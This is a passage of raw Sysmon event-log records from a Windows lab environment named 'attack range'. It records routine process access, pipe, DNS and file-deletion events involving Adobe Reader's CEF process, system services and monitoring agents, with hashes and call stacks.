--gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\debug.log" --mojo-platform-channel-handle=1456 --field-trial-handle=1448,i,5134491287969886603,3611864682310924974,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=387770AB000A15CC3D30E0594F2AFC02,SHA256=AD06655370603DD0F76F2E7824F749DA4B753EF57ECAE93B9A24B5EB7F5EC27A,IMPHASH=6B10CB5D44CC40175E3AB76C7CC1D2A0{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe" --backgroundcolor=16514043 10341000x800000000000000046862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000046861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:10.529{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.1358614700673336224C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 17141700x800000000000000046860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:10.529{FE4C2B44-E650-63C7-8906-00000000AF02}3796\mojo.3796.5768.1358614700673336224C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000046859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+268c|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.529{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.482{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E650-63C7-8906-00000000AF02}3796C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018719Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:11.181{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B22257A9B2D6EC33D418C3D309F4317,SHA256=2D1953E2E63D2D4D01E10C3C514ED05759A229B441699D9A91EE3D2EB171688D,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000047147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.327{FE4C2B44-E652-63C7-8C06-00000000AF02}7044wpad9003-C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.982{FE4C2B44-DA03-63C7-2000-00000000AF02}24521728C:\Windows\sysmon64.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1d018|C:\Windows\System32\KERNEL32.DLL+25aa7|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+3625|C:\Windows\System32\sechost.dll+2bfd|C:\Windows\System32\sechost.dll+2a01|C:\Windows\System32\sechost.dll+18df|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000047145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:10.327{FE4C2B44-E652-63C7-8C06-00000000AF02}7044wpad9003-C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe 10341000x800000000000000047144Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.982{FE4C2B44-DA03-63C7-2000-00000000AF02}24521728C:\Windows\sysmon64.exe{FE4C2B44-E652-63C7-8C06-00000000AF02}7044C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1d018|C:\Windows\System32\KERNEL32.DLL+25aa7|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16495|C:\Windows\sysmon64.exe+16778|C:\Windows\sysmon64.exe+16aae|C:\Windows\sysmon64.exe+1a5ae|C:\Windows\sysmon64.exe+5ea0|C:\Windows\sysmon64.exe+6037|C:\Windows\System32\sechost.dll+3625|C:\Windows\System32\sechost.dll+2bfd|C:\Windows\System32\sechost.dll+2a01|C:\Windows\System32\sechost.dll+18df|C:\Windows\sysmon64.exe+6213|C:\Windows\sysmon64.exe+b0519|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047143Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047142Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.892{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047141Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.892{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8B06-00000000AF02}4888C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047140Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047139Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047138Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E652-63C7-8A06-00000000AF02}6652C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000047137Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000047135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.851{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0MD5=E59BB5660622310B54ECE4898DB54FCB,SHA256=BAD6DDD81C3E4FE054056F430EF02F9F902805F32D8D9700DB702F5BE89AF605,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000047134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.850{FE4C2B44-E650-63C7-8906-00000000AF02}3796ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0MD5=57C92796AFEC913DBDF2B01BEEB3DED6,SHA256=25C334D10D03A83A6E1F7EDEA7D7B3A18DA55B5DD0A5F10075EF8A4BE2C867A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.850{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.848{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.845{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.816{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000047124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program 